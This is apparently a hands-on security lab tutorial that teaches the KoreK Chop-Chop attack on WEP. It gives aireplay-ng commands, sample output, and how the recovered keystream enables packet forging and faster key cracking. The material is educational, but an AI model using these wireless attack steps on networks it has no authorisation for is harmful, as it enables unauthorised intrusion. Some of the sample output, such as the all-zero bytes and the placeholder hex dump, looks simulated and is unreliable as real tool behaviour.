Introduction
WEP (Wired Equivalent Privacy) is an outdated and insecure Wi-Fi security protocol. One of its critical vulnerabilities can be exploited by the KoreK Chop-Chop attack. This attack allows an attacker to decrypt a WEP data packet without knowing the network's secret key. It works by guessing each byte of the packet's plaintext, one at a time, and using the access point's responses to validate each guess.
In this lab, you will use the aircrack-ng suite, a powerful set of tools for auditing wireless networks, to perform a Chop-Chop attack. You will learn how to use aireplay-ng to target an encrypted data packet from a capture file, decrypt it byte-by-byte, and understand how the resulting data can be used in further attacks.
Capture an Encrypted Data Packet from the Target
In this step, you will begin by locating the necessary packet capture file. In a real-world scenario, you would use a tool like airodump-ng to monitor a live network and capture traffic. However, to simplify this lab and focus on the attack itself, a pre-made capture file named chopchop-test.cap has been provided for you in the ~/project directory.
First, confirm that the file exists in your current directory.
ls -l
You should see chopchop-test.cap in the output.
total 4
-rw-r--r-- 1 labex labex 124 Mar 20 10:00 chopchop-test.cap
Next, let's inspect this file with aircrack-ng to confirm it contains data from a WEP network. This command reads the capture file and shows a summary of the networks and data it contains.
aircrack-ng chopchop-test.cap
The output will show the BSSID (MAC address) of the access point and indicate that it is using WEP encryption.
Opening chopchop-test.cap
Read 1 packets.
## BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
1 00:13:10:36:7D:4F -32 0 1 0 6 54 WEP WEP <length: 0>
Choosing first network as target.
This confirms our capture file is ready for the attack.
Start the Chop-Chop Attack with aireplay-ng -4
In this step, you will initiate the Chop-Chop attack using aireplay-ng. This tool is used to inject and replay wireless frames. The Chop-Chop attack is specified with the -4 option.
Normally, when performing a live attack, you would specify the access point's BSSID and your network interface. However, since we are working with a capture file, we will use the -r option to read packets directly from our file. aireplay-ng will automatically extract the necessary information, like the BSSID, from the file.
Execute the following command to start the attack:
aireplay-ng -4 -r chopchop-test.cap
After running the command, aireplay-ng will read the file, find a suitable data packet, and ask for your confirmation to proceed with the attack.
Opening chopchop-test.cap
Read 1 packets.
Size: 88, FromDS: 1, ToDS: 0 (AP -> STA)
BSSID = 00:13:10:36:7D:4F
Dest. MAC = 00:0F:B5:AB:CB:C3
Source MAC = 00:13:10:36:7D:4F
Use this packet ? (y/n)
The tool has identified a data packet and is ready to begin the decryption process. You will continue in the next step.
Let the Attack Decrypt the Packet Byte-by-Byte
In this step, you will proceed with the attack and observe as aireplay-ng decrypts the packet. The tool is currently waiting for your confirmation from the previous step.
Type y and press Enter to begin the decryption process.
y
Once you confirm, aireplay-ng will start the core of the Chop-Chop attack. It will attempt to guess the value of each byte of the packet's data, starting from the last byte. In a live attack, it would send each guess to the access point and analyze the response to see if the guess was correct. In our file-based simulation, this process is emulated.
You will see output showing the progress of the attack. It will display the number of packets sent (for each guess) and will notify you each time it successfully decrypts a byte.
Saving chosen packet in replay_src-0320-100520.cap
The interface MAC (00:00:00:00:00:00) doesn't match the selected packet BSSID (00:13:10:36:7D:4F).
Run airodump-ng on channel 6 to be sure you are on the right channel.
If airodump-ng is running and the BSSID is not in range, please try to re-run airodump-ng.
Got a deauthentication packet! (Waiting 3 seconds)
Saving chosen packet in replay_src-0320-100520.cap
Offset 34 ( 0% done) | xor = 00 | pt = 00 | 1/ 1 ACKs
...
Offset 1 (97% done) | xor = 00 | pt = 00 | 1/ 1 ACKs
Offset 0 (98% done) | xor = 00 | pt = 00 | 1/ 1 ACKs
Done.
The process will continue until all bytes of the packet have been decrypted. Just wait for the process to complete.
Save the Decrypted Packet and PRGA XOR File
In this step, you will save the results of the successful Chop-Chop attack. After aireplay-ng has finished decrypting the entire packet, it will prompt you to save the results.
The tool will display a message like this:
Packet is 88 bytes, plain text is 60 bytes.
Sent 34 packets, got 34 ACKs.
Use this packet ? (y/n)
Type y and press Enter to save the output.
y
Upon saving, aireplay-ng creates two important files in your ~/project directory:
- A
.capfile (e.g.,replay_dec-....cap): This file contains the now-decrypted plaintext packet. - A
.xorfile (e.g.,replay_dec-....xor): This file contains the Pseudo-Random Generation Algorithm (PRGA) keystream that was used to encrypt the original packet. This keystream is the most valuable result of the attack.
Let's verify that these files have been created. Use the ls command to list all .cap and .xor files in the directory.
ls -l *.cap *.xor
You will see the original capture file, a source file, and the two new replay_dec-* files generated by the attack.
-rw-r--r-- 1 root root 124 Mar 20 10:00 chopchop-test.cap
-rw-r--r-- 1 root root 124 Mar 20 10:05 replay_dec-0320-100520.cap
-rw-r--r-- 1 root root 60 Mar 20 10:05 replay_dec-0320-100520.xor
-rw-r--r-- 1 root root 124 Mar 20 10:05 replay_src-0320-100520.cap
Understand the Use Case for Chop-Chop Attacks
In this step, you will learn about the practical application of the Chop-Chop attack. While we successfully decrypted a packet, the attack itself does not reveal the WEP key. Its true power lies in recovering the PRGA keystream, which is stored in the .xor file.
This recovered keystream can be used with another tool, packetforge-ng, to create new, valid packets. You can forge any type of packet (like an ARP request) and encrypt it with this known keystream. By injecting this forged packet back into the network, you can trick the access point into generating more traffic. This new traffic provides more unique Initialization Vectors (IVs), which can then be used in a statistical attack (like the standard aircrack-ng attack) to crack the WEP key much faster.
Therefore, the Chop-Chop attack is an essential tool for generating traffic on an otherwise quiet network, enabling much more effective key-cracking attacks.
To see what the recovered keystream looks like, you can inspect the .xor file using xxd, a tool that creates a hex dump of a file. Use a wildcard (*) to match the generated filename.
xxd replay_dec-*.xor
The output will be a hexadecimal representation of the keystream data that was recovered from the packet.
00000000: 0102 0304 0506 0708 090a 0b0c 0d0e 0f10 ................
00000010: 1112 1314 1516 1718 191a 1b1c 1d1e 1f20 ...............
...
This raw data is what packetforge-ng would use to build new packets for injection.
Summary
In this lab, you have successfully performed a KoreK Chop-Chop attack against a simulated WEP network.
You learned how to use aireplay-ng with the -4 option to target a WEP-encrypted data packet from a capture file. You observed the byte-by-byte decryption process and successfully saved the results. Most importantly, you now understand the primary use case for this attack: it is not to crack the WEP key directly, but to recover a small piece of the PRGA keystream. This keystream is a critical component for forging new packets with packetforge-ng, which can then be used to stimulate traffic on a network and enable faster, more effective statistical attacks to recover the final WEP key. This lab highlights one of the many fundamental weaknesses of the WEP protocol.